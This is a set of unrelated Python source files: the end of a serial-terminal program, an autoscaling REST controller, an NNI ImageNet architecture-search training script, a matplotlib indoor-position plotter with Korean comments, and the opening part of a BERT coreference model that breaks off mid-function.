action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
default_controller.py
|
import connexion
import six
from server import util
from auto_scaling import *
from server.models.scaling_info import DQN_ScalingInfo
from server.models.scaling_info import Threshold_ScalingInfo
from server.models.scaling_info import AutoScaler
def get_all_scaling():
response = []
for process in scaler_list:
response.append(process.get_info())
return response
def get_scaling(name):
response = [ process.get_info() for process in scaler_list if process.scaling_name == name]
return response
def create_threshold_scaling(body):
if connexion.request.is_json:
body = Threshold_ScalingInfo.from_dict(connexion.request.get_json())
response = AutoScaler(body, "threshold")
scaler_list.append(response)
threading.Thread(target=threshold_scaling, args=(response,)).start()
return response.get_info()
def create_dqn_scaling(body):
if connexion.request.is_json:
body = DQN_ScalingInfo.from_dict(connexion.request.get_json())
response = AutoScaler(body, "dqn")
scaler_list.append(response)
threading.Thread(target=dqn_scaling, args=(response,)).start()
return response.get_info()
def delete_scaling(name):
index = -1
response = []
for process in scaler_list:
if process.scaling_name == name:
index = scaler_list.index(process)
break
if index > -1:
response = scaler_list[index].get_info()
scaler_list[index].set_active_flag(False)
scaler_list.remove(scaler_list[index])
return response
|
imagenet_train.py
|
# Copyright (c) Microsoft Corporation
# Copyright (c) Peng Cheng Laboratory
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# -*-coding:utf-8-*-
import argparse
import logging
import os
import json
import time
import zmq
import random
import numpy as np
import multiprocessing
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping
from tensorflow.keras.optimizers import SGD
import nni
from nni.networkmorphism_tuner.graph import json_to_graph
import nni.hyperopt_tuner.hyperopt_tuner as TPEtuner
import utils
import imagenet_preprocessing
import dataset as ds
os.environ['TF_ENABLE_AUTO_MIXED_PRECISION'] = '1'
log_format = "%(asctime)s %(message)s"
logging.basicConfig(
filename="networkmorphism.log",
filemode="a",
level=logging.INFO,
format=log_format,
datefmt="%m/%d %I:%M:%S %p",
)
logger = logging.getLogger("Imagenet-network-morphism-tfkeras")
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
# imagenet2012
Ntrain = 1281167
Nvalidation = 50000
shuffle_buffer = 1024
examples_per_epoch = shuffle_buffer
tf.config.optimizer.set_jit(True)
def get_args():
""" get args from command line
"""
parser = argparse.ArgumentParser("imagenet")
parser.add_argument("--ip", type=str, default='127.0.0.1', help="ip address")
parser.add_argument("--train_data_dir", type=str, default=None, help="tain data directory")
parser.add_argument("--val_data_dir", type=str, default=None, help="val data directory")
parser.add_argument("--slave", type=int, default=2, help="trial concurrency")
parser.add_argument("--batch_size", type=int, default=448, help="batch size")
parser.add_argument("--warmup_1", type=int, default=15, help="epoch of first warm up round")
parser.add_argument("--warmup_2", type=int, default=30, help="epoch of second warm up round")
parser.add_argument("--warmup_3", type=int, default=45, help="epoch of third warm up round")
parser.add_argument("--epochs", type=int, default=60, help="epoch limit")
parser.add_argument("--initial_lr", type=float, default=1e-1, help="init learning rate")
parser.add_argument("--final_lr", type=float, default=0, help="final learning rate")
parser.add_argument("--maxTPEsearchNum", type=int, default=2, help="max TPE search number")
parser.add_argument("--smooth_factor", type=float, default=0.1, help="max TPE search number")
parser.add_argument("--num_parallel_calls", type=int, default=48, help="number of parallel call during data loading")
return parser.parse_args()
def build_graph_from_json(ir_model_json):
"""build model from json representation
"""
try:
graph = json_to_graph(ir_model_json)
logging.debug(graph.operation_history)
model = graph.produce_tf_model()
return model
except Exception as E:
print("#########:" + str(E))
f = open('resnet50.json', 'r')
a = json.load(f)
RCV_CONFIG = json.dumps(a)
f.close()
graph = json_to_graph(RCV_CONFIG)
model = graph.produce_tf_model()
return model
def parse_rev_args(receive_msg, esargs):
""" parse reveive msgs to global variable
"""
global net
global bs_explore
global gpus
# Model
bs_explore = int(esargs['batch_size'])
mirrored_strategy = tf.distribute.MirroredStrategy()
with mirrored_strategy.scope():
net = build_graph_from_json(receive_msg)
optimizer = SGD(lr=args.initial_lr, momentum=0.9, decay=1e-4)
optimizer = tf.train.experimental.enable_mixed_precision_graph_rewrite(optimizer, loss_scale=256)
loss = tf.keras.losses.CategoricalCrossentropy(label_smoothing=args.smooth_factor)
denseList = []
for index, layer in enumerate(net.layers):
if isinstance(layer, tf.keras.layers.Dropout):
net.layers[index].rate = esargs['dropout_rate']
if isinstance(layer, tf.keras.layers.Dense):
denseList.append(index)
if len(denseList) == 0:
thresh = 175
elif len(denseList) == 1:
thresh = denseList[0] + 1
else:
thresh = 175
for index, layer in enumerate(net.layers):
if index > thresh:
if isinstance(layer, tf.keras.layers.Conv2D):
net.layers[index].kernel_size = (esargs['kernel_size'], esargs['kernel_size'])
# Compile the model
net.compile(
# loss="categorical_crossentropy", optimizer=optimizer, metrics=["accuracy"]
loss=loss, optimizer=optimizer, metrics=["accuracy"]
)
class SendMetrics(tf.keras.callbacks.Callback):
"""
Keras callback to send metrics to NNI framework
"""
def __init__(self, hp_path):
super(SendMetrics, self).__init__()
self.hp_path = hp_path
self.best_acc = 0
def on_epoch_end(self, epoch, logs=None):
"""
Run on end of each epoch
"""
if logs is None:
logs = dict()
logger.debug(logs)
with open(self.hp_path, 'r') as f:
hp = json.load(f)
hp['epoch'] = epoch + 1
if logs['val_accuracy'] > self.best_acc:
self.best_acc = logs['val_accuracy']
hp['single_acc'] = logs['val_accuracy']
hp['finish_date'] = time.strftime('%m/%d/%Y, %H:%M:%S', time.localtime(time.time()))
with open(self.hp_path, 'w') as f:
json.dump(hp, f)
def train_eval(esargs, RCV_CONFIG, seqid):
""" train and eval the model
"""
global net
global best_acc
global bs_explore
global gpus
global hp_path
best_acc = 0
parse_rev_args(RCV_CONFIG, esargs)
# train procedure
trial_id = nni.get_trial_id()
available_devices = os.environ["CUDA_VISIBLE_DEVICES"]
gpus = len(available_devices.split(","))
is_training = True
filenames = ds.get_filenames(args.train_data_dir)
dataset = tf.data.Dataset.from_tensor_slices(filenames)
dataset = dataset.flat_map(tf.data.TFRecordDataset)
ds_train = ds.process_record_dataset(
dataset=dataset,
is_training=is_training,
batch_size=bs_explore,
shuffle_buffer=shuffle_buffer,
parse_record_fn=ds.parse_record,
num_epochs=args.epochs,
npc=args.num_parallel_calls,
num_gpus=gpus,
examples_per_epoch=examples_per_epoch if is_training else None,
dtype=tf.float32
)
is_training = False
filenames = ds.get_filenames(args.val_data_dir)
dataset = tf.data.Dataset.from_tensor_slices(filenames)
dataset = dataset.flat_map(tf.data.TFRecordDataset)
ds_val = ds.process_record_dataset(
dataset=dataset,
is_training=is_training,
batch_size=bs_explore,
shuffle_buffer=shuffle_buffer,
parse_record_fn=ds.parse_record,
num_epochs=args.epochs,
npc=args.num_parallel_calls,
num_gpus=gpus,
examples_per_epoch=None,
dtype=tf.float32
)
# run epochs and patience
loopnum = seqid // args.slave
patience = min(int(6 + (2 * loopnum)), 20)
if loopnum == 0:
run_epochs = int(args.warmup_1)
elif loopnum == 1:
run_epochs = int(args.warmup_2)
elif loopnum == 2:
run_epochs = int(args.warmup_3)
else:
run_epochs = int(args.epochs)
# if loopnum < 4:
# patience = int(8 + (2 * loopnum))
# run_epochs = int(10 + (20 * loopnum))
# else:
# patience = 16
# run_epochs = args.epochs
# lr strategy
def scheduler2(epoch):
lr_max = args.initial_lr
total_epochs = args.epochs
lr_each_epoch = lr_max - lr_max * epoch / total_epochs
return lr_each_epoch
callback = tf.keras.callbacks.LearningRateScheduler(scheduler2)
# save weights
checkpoint_dir = os.environ["HOME"] + "/nni/experiments/" + str(nni.get_experiment_id()) + "/checkpoint/" + str(
nni.get_trial_id())
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
checkpoint_filepath = checkpoint_dir + "/weights." + "epoch." + str(run_epochs) + ".hdf5"
model_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
filepath=checkpoint_filepath,
monitor='val_accuracy',
mode='max',
save_best_only=True,
save_freq='epoch',
save_weights_only=True,
)
history = net.fit(
ds_train,
epochs=run_epochs,
steps_per_epoch=Ntrain // bs_explore // gpus,
validation_data=ds_val,
validation_steps=Nvalidation // bs_explore // gpus,
verbose=1,
shuffle=False,
callbacks=[SendMetrics(hp_path),
callback,
EarlyStopping(min_delta=0.001, patience=patience),
model_checkpoint_callback
])
# trial report final acc to tuner
acc = 0
acc_list = history.history['val_accuracy']
for acc_n in acc_list:
if float(acc_n) > acc:
acc = float(acc_n)
try:
# predict acc
if run_epochs >= 10 and run_epochs < 80:
epoch_x = range(1, len(acc_list) + 1)
pacc = utils.predict_acc(trial_id, epoch_x, acc_list, 90, True)
best_acc = float(pacc)
except Exception as E:
print("Predict failed.")
if acc > best_acc:
best_acc = acc
logger.debug("Final result is: %.3f", acc)
return best_acc, history.epoch[-1]
if __name__ == "__main__":
example_start_time = time.time()
net = None
args = get_args()
try:
experiment_path = os.environ["HOME"] + "/mountdir/nni/experiments/" + str(nni.get_experiment_id())
lock = multiprocessing.Lock()
context = zmq.Context()
socket = context.socket(zmq.REQ)
tmpstr = 'tcp://' + args.ip + ':800081'
socket.connect(tmpstr)
os.makedirs(experiment_path + "/trials/" + str(nni.get_trial_id()))
get_next_parameter_start = time.time()
nni.get_next_parameter(socket)
get_next_parameter_end = time.time()
while True:
lock.acquire()
with open(experiment_path + "/graph.txt", "a+") as f:
f.seek(0)
lines = f.readlines()
lock.release()
if lines:
break
if len(lines) > args.slave:
x = random.randint(1, args.slave)
json_and_id_str = lines[-x].replace("\n", "")
else:
json_and_id_str = lines[-1].replace("\n", "")
with open(experiment_path + "/trials/" + str(nni.get_trial_id()) + "/output.log", "a+") as f:
f.write("sequence_id=" + str(nni.get_sequence_id()) + "\n")
json_and_id = dict((l.split('=') for l in json_and_id_str.split('+')))
if str(json_and_id['history']) == "True":
socket.send_pyobj({"type": "generated_parameter", "parameters": json_and_id['json_out'],
"father_id": int(json_and_id['father_id']), "parameter_id": int(nni.get_sequence_id())})
message = socket.recv_pyobj()
elif str(json_and_id['history']) == "False":
socket.send_pyobj({"type": "generated_parameter"})
message = socket.recv_pyobj()
RCV_CONFIG = json_and_id['json_out']
start_time = time.time()
with open('search_space.json') as json_file:
search_space = json.load(json_file)
min_gpu_mem = utils.MinGpuMem()
for index in range(len(search_space['batch_size']['_value'])):
search_space['batch_size']['_value'][index] *= min_gpu_mem
init_search_space_point = {"dropout_rate": 0.0, "kernel_size": 3, "batch_size": args.batch_size}
if 'father_id' in json_and_id:
json_father_id = int(json_and_id['father_id'])
while True:
if os.path.isfile(experiment_path + '/hyperparameter/' + str(json_father_id) + '.json'):
with open(experiment_path + '/hyperparameter/' + str(json_father_id) + '.json') as hp_json:
init_search_space_point = json.load(hp_json)
break
elif json_father_id > 0:
json_father_id -= 1
else:
break
train_num = 0
TPE = TPEtuner.HyperoptTuner('tpe')
TPE.update_search_space(search_space)
searched_space_point = {}
start_date = time.strftime('%m/%d/%Y, %H:%M:%S', time.localtime(time.time()))
current_json = json_and_id['json_out']
current_hyperparameter = init_search_space_point
if not os.path.isdir(experiment_path + '/hyperparameter_epoch/' + str(nni.get_trial_id())):
os.makedirs(experiment_path + '/hyperparameter_epoch/' + str(nni.get_trial_id()))
with open(experiment_path + '/hyperparameter_epoch/' + str(nni.get_trial_id()) + '/model.json', 'w') as f:
f.write(current_json)
global hp_path
hp_path = experiment_path + '/hyperparameter_epoch/' + str(nni.get_trial_id()) + '/0.json'
with open(hp_path, 'w') as f:
json.dump(
{'get_sequence_id': int(nni.get_sequence_id()), 'hyperparameter': current_hyperparameter, 'epoch': 0,
'single_acc': 0,
'train_time': 0, 'start_date': start_date}, f)
pid = os.getpid()
trial_log_path = os.environ["HOME"] + "/nni/experiments/" + str(nni.get_experiment_id()) + '/trials/' + str(
nni.get_trial_id()) + '/trial.log'
p = multiprocessing.Process(target=utils.trial_activity, args=(trial_log_path, pid,))
p.daemon = True
p.start()
single_acc, current_ep = train_eval(init_search_space_point, RCV_CONFIG, int(nni.get_sequence_id()))
print("HPO-" + str(train_num) + ",hyperparameters:" + str(init_search_space_point) + ",best_val_acc:" + str(
single_acc))
best_final = single_acc
searched_space_point = init_search_space_point
if int(nni.get_sequence_id()) > 3 * args.slave - 1:
dict_first_data = init_search_space_point
TPE.receive_trial_result(train_num, dict_first_data, single_acc)
TPEearlystop = utils.EarlyStopping(patience=3, mode="max")
for train_num in range(1, args.maxTPEsearchNum):
params = TPE.generate_parameters(train_num)
start_date = time.strftime('%m/%d/%Y, %H:%M:%S', time.localtime(time.time()))
current_hyperparameter = params
hp_path = experiment_path + '/hyperparameter_epoch/' + str(nni.get_trial_id()) + '/' + str(
train_num) + '.json'
with open(hp_path, 'w') as f:
json.dump(
{'get_sequence_id': int(nni.get_sequence_id()), 'hyperparameter': current_hyperparameter,
'epoch': 0, 'single_acc': 0,
'train_time': 0, 'start_date': start_date}, f)
single_acc, current_ep = train_eval(params, RCV_CONFIG, int(nni.get_sequence_id()))
print("HPO-" + str(train_num) + ",hyperparameters:" + str(params) + ",best_val_acc:" + str(single_acc))
TPE.receive_trial_result(train_num, params, single_acc)
if single_acc > best_final:
best_final = single_acc
searched_space_point = params
if TPEearlystop.step(single_acc):
break
nni.report_final_result(best_final, socket)
if not os.path.isdir(experiment_path + '/hyperparameter'):
os.makedirs(experiment_path + '/hyperparameter')
with open(experiment_path + '/hyperparameter/' + str(nni.get_sequence_id()) + '.json',
'w') as hyperparameter_json:
json.dump(searched_space_point, hyperparameter_json)
end_time = time.time()
with open(experiment_path + "/train_time", "w+") as f:
f.write(str(end_time - start_time))
with open(experiment_path + "/trials/" + str(nni.get_trial_id()) + "/output.log", "a+") as f:
f.write("duration=" + str(time.time() - example_start_time) + "\n")
f.write("best_acc=" + str(best_final) + "\n")
except Exception as exception:
logger.exception(exception)
raise
exit(0)
|
draw.py
|
import matplotlib.pyplot as plt
import currentlocation as loc
import time
import threading
#written by 김보라_2020
GUI_FILE_NAME = "draw.txt"
im = plt.imread("MapDisplay.png")
#implot = plt.imshow(im)
plt.imshow(im)
MODE_FINGERPRINT = 1
MODE_KNN = 2
MODE_TRILATERATION = 3
"""
삼변측량을 하면, 지정된 영역 내에서의 위치를 알려 주니까,
해당 영역의 (0,0)에 해당하는 현실 위치를 다시 더해줘야
전체 지도 내에서의 위치를 알 수 있다.
이 때 더해주는 값이 아래와 같다.
"""
TRI_REALx_OFFSET = 14.7
TRI_REALy_OFFSET = 5.7
cnt = 0
# 화면 좌측 상단이 (0,0) 으로 시작하는 지점이다.
def func(mode, id, REALx, REALy):
plt.clf()
plt.imshow(im)
IMGWIDTH = 1596
REALWIDTH = 152.8
IMGHEIGHT = 462
REALHEIGHT = 44.2
if mode == MODE_TRILATERATION:
REALx += TRI_REALx_OFFSET
REALy += TRI_REALy_OFFSET
gui_x = REALx * IMGWIDTH / REALWIDTH
gui_y = REALy * IMGHEIGHT / REALHEIGHT
if id == 1:
loc.aGUILocation = [gui_x, gui_y]
# print("aLocation을 업데이트 합니다.")
print(loc.aGUILocation)
elif id == 2:
loc.bGUILocation = [gui_x, gui_y]
# print("bLocation을 업데이트 합니다.")
print(loc.bGUILocation)
else:
assert False, "잘못된 ID 값입니다."
plt.plot(loc.aGUILocation[0], loc.aGUILocation[1], 'ro', alpha=0.75)
# print("plot:")
# print(loc.aGUILocation)
plt.plot(loc.bGUILocation[0], loc.bGUILocation[1], 'bo', alpha=0.75)
# print("plot:")
# print(loc.bGUILocation)
def GUI():
global cnt
GUI_FILE_NAME = "draw.txt"
time.sleep(4)
while True:
f = open(GUI_FILE_NAME, 'r')
line = f.readline()
line = line.strip()
data = str(line).split(':')
mode = int(data[0])
user_id = int(data[1])
REALx = float(data[2])
REALy = float(data[3])
f.close()
func(mode, user_id, REALx, REALy)
if cnt != 0:
print('show block')
plt.show(block=False)
time.sleep(0.2)
cnt += 1
func(1, 1, 0, 0)
func(1, 2, 0, 0)
t = threading.Thread(target=GUI)
t.start()
#while True:
# try:
plt.show()
# time.sleep(1)
# except KeyboardInterrupt:
# break
# except Exception as e:
# print(e)
# break
#print('end')
"""
func(1, 1, 29, 14.4)
print("1번 좌표 업데이트")
func(1, 2, 60.5, 17)
print("2번 좌표 업데이트")
func(1, 1, 39, 14.4)
print("1번 좌표 업데이트")
func(1, 1, 35, 14.5)
print("1번 좌표 업데이트")
func(1, 1, 32, 18.4)
print("1번 좌표 업데이트")
func(3, 2, 0, 0)
print("2번 좌표 업데이트")
"""
|
gold_mentions.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import operator
import random
import math
import json
import threading
import numpy as np
import tensorflow as tf
import h5py
import os
import sys
import util
import coref_ops
import conll
import metrics
import optimization
from bert import tokenization
from bert import modeling
class CorefModel(object):
def __init__(self, config):
self.config = config
self.max_segment_len = config['max_segment_len']
self.max_span_width = config["max_span_width"]
self.genres = { g:i for i,g in enumerate(config["genres"]) }
self.subtoken_maps = {}
self.gold = {}
self.eval_data = None # Load eval data lazily.
self.bert_config = modeling.BertConfig.from_json_file(config["bert_config_file"])
self.tokenizer = tokenization.FullTokenizer(
vocab_file=config['vocab_file'], do_lower_case=False)
input_props = []
input_props.append((tf.int32, [None, None])) # input_ids.
input_props.append((tf.int32, [None, None])) # input_mask
input_props.append((tf.int32, [None])) # Text lengths.
input_props.append((tf.int32, [None, None])) # Speaker IDs.
input_props.append((tf.int32, [])) # Genre.
input_props.append((tf.bool, [])) # Is training.
input_props.append((tf.int32, [None])) # Gold starts.
input_props.append((tf.int32, [None])) # Gold ends.
input_props.append((tf.int32, [None])) # Cluster ids.
input_props.append((tf.int32, [None])) # Sentence Map
self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
dtypes, shapes = zip(*input_props)
queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
self.enqueue_op = queue.enqueue(self.queue_input_tensors)
self.input_tensors = queue.dequeue()
self.predictions, self.loss = self.get_predictions_and_loss(*self.input_tensors)
# bert stuff
tvars = tf.trainable_variables()
assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, config['init_checkpoint'])
tf.train.init_from_checkpoint(config['init_checkpoint'], assignment_map)
print("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
# tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
# init_string)
print(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
num_train_steps = int(
self.config['num_docs'] * self.config['num_epochs'])
num_warmup_steps = int(num_train_steps * 0.1)
self.global_step = tf.train.get_or_create_global_step()
self.train_op = optimization.create_custom_optimizer(tvars,
self.loss, self.config['bert_learning_rate'], self.config['task_learning_rate'],
num_train_steps, num_warmup_steps, False, self.global_step, freeze=-1)
def start_enqueue_thread(self, session):
with open(self.config["train_path"]) as f:
train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
def _enqueue_loop():
while True:
random.shuffle(train_examples)
if self.config['single_example']:
for example in train_examples:
tensorized_example = self.tensorize_example(example, is_training=True)
feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
session.run(self.enqueue_op, feed_dict=feed_dict)
else:
examples = []
for example in train_examples:
tensorized = self.tensorize_example(example, is_training=True)
if type(tensorized) is not list:
tensorized = [tensorized]
examples += tensorized
random.shuffle(examples)
print('num examples', len(examples))
for example in examples:
feed_dict = dict(zip(self.queue_input_tensors, example))
session.run(self.enqueue_op, feed_dict=feed_dict)
enqueue_thread = threading.Thread(target=_enqueue_loop)
enqueue_thread.daemon = True
enqueue_thread.start()
def restore(self, session):
# Don't try to restore unused variables from the TF-Hub ELMo module.
vars_to_restore = [v for v in tf.global_variables() ]
saver = tf.train.Saver(vars_to_restore)
checkpoint_path = os.path.join(self.config["log_dir"], "model.max.ckpt")
print("Restoring from {}".format(checkpoint_path))
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
def tensorize_span_labels(self, tuples, label_dict):
if len(tuples) > 0:
starts, ends, labels = zip(*tuples)
else:
starts, ends, labels = [], [], []
return np.array(starts), np.array(ends), np.array([label_dict[c] for c in labels])
def get_speaker_dict(self, speakers):
speaker_dict = {'UNK': 0, '[SPL]': 1}
for s in speakers:
if s not in speaker_dict and len(speaker_dict) < self.config['max_num_speakers']:
speaker_dict[s] = len(speaker_dict)
return speaker_dict
def tensorize_example(self, example, is_training):
clusters = example["clusters"]
gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
gold_mention_map = {m:i for i,m in enumerate(gold_mentions)}
cluster_ids = np.zeros(len(gold_mentions))
for cluster_id, cluster in enumerate(clusters):
for mention in cluster:
cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
sentences = example["sentences"]
num_words = sum(len(s) for s in sentences)
speakers = example["speakers"]
# assert num_words == len(speakers), (num_words, len(speakers))
speaker_dict = self.get_speaker_dict(util.flatten(speakers))
sentence_map = example['sentence_map']
max_sentence_length = self.max_segment_len
text_len = np.array([len(s) for s in sentences])
input_ids, input_mask, speaker_ids = [], [], []
for i, (sentence, speaker) in enumerate(zip(sentences, speakers)):
sent_input_ids = self.tokenizer.convert_tokens_to_ids(sentence)
sent_input_mask = [1] * len(sent_input_ids)
sent_speaker_ids = [speaker_dict.get(s, 3) for s in speaker]
while len(sent_input_ids) < max_sentence_length:
sent_input_ids.append(0)
sent_input_mask.append(0)
sent_speaker_ids.append(0)
input_ids.append(sent_input_ids)
speaker_ids.append(sent_speaker_ids)
input_mask.append(sent_input_mask)
input_ids = np.array(input_ids)
input_mask = np.array(input_mask)
speaker_ids = np.array(speaker_ids)
assert num_words == np.sum(input_mask), (num_words, np.sum(input_mask))
# speaker_dict = { s:i for i,s in enumerate(set(speakers)) }
# speaker_ids = np.array([speaker_dict[s] for s in speakers])
doc_key = example["doc_key"]
self.subtoken_maps[doc_key] = example["subtoken_map"]
self.gold[doc_key] = example["clusters"]
genre = self.genres.get(doc_key[:2], 0)
gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
example_tensors = (input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map)
if is_training and len(sentences) > self.config["max_training_sentences"]:
if self.config['single_example']:
return self.truncate_example(*example_tensors)
else:
offsets = range(self.config['max_training_sentences'], len(sentences), self.config['max_training_sentences'])
tensor_list = [self.truncate_example(*(example_tensors + (offset,))) for offset in offsets]
return tensor_list
else:
return example_tensors
def truncate_example(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map, sentence_offset=None):
max_training_sentences = self.config["max_training_sentences"]
num_sentences = input_ids.shape[0]
assert num_sentences > max_training_sentences
sentence_offset = random.randint(0, num_sentences - max_training_sentences) if sentence_offset is None else sentence_offset
word_offset = text_len[:sentence_offset].sum()
num_words = text_len[sentence_offset:sentence_offset + max_training_sentences].sum()
input_ids = input_ids[sentence_offset:sentence_offset + max_training_sentences, :]
input_mask = input_mask[sentence_offset:sentence_offset + max_training_sentences, :]
speaker_ids = speaker_ids[sentence_offset:sentence_offset + max_training_sentences, :]
text_len = text_len[sentence_offset:sentence_offset + max_training_sentences]
sentence_map = sentence_map[word_offset: word_offset + num_words]
gold_spans = np.logical_and(gold_ends >= word_offset, gold_starts < word_offset + num_words)
gold_starts = gold_starts[gold_spans] - word_offset
gold_ends = gold_ends[gold_spans] - word_offset
cluster_ids = cluster_ids[gold_spans]
return input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
same_start = tf.equal(tf.expand_dims(labeled_starts, 1), tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1), tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
def get_dropout(self, dropout_rate, is_training):
return 1 - (tf.to_float(is_training) * dropout_rate)
def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c):
k = util.shape(top_span_emb, 0)
top_span_range = tf.range(k) # [k]
antecedent_offsets = tf.expand_dims(top_span_range, 1) - tf.expand_dims(top_span_range, 0) # [k, k]
antecedents_mask = antecedent_offsets >= 1 # [k, k]
fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores, 0) # [k, k]
fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask)) # [k, k]
fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb) # [k, k]
if self.config['use_prior']:
antecedent_distance_buckets = self.bucket_distance(antecedent_offsets) # [k, c]
distance_scores = util.projection(tf.nn.dropout(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), self.dropout), 1, initializer=tf.truncated_normal_initializer(stddev=0.02)) #[10, 1]
antecedent_distance_scores = tf.gather(tf.squeeze(distance_scores, 1), antecedent_distance_buckets) # [k, c]
fast_antecedent_scores += antecedent_distance_scores
_, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False) # [k, c]
top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents) # [k, c]
top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents) # [k, c]
top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents) # [k, c]
return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def get_predictions_and_loss(self, input_ids, input_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map):
model = modeling.BertModel(
config=self.bert_config,
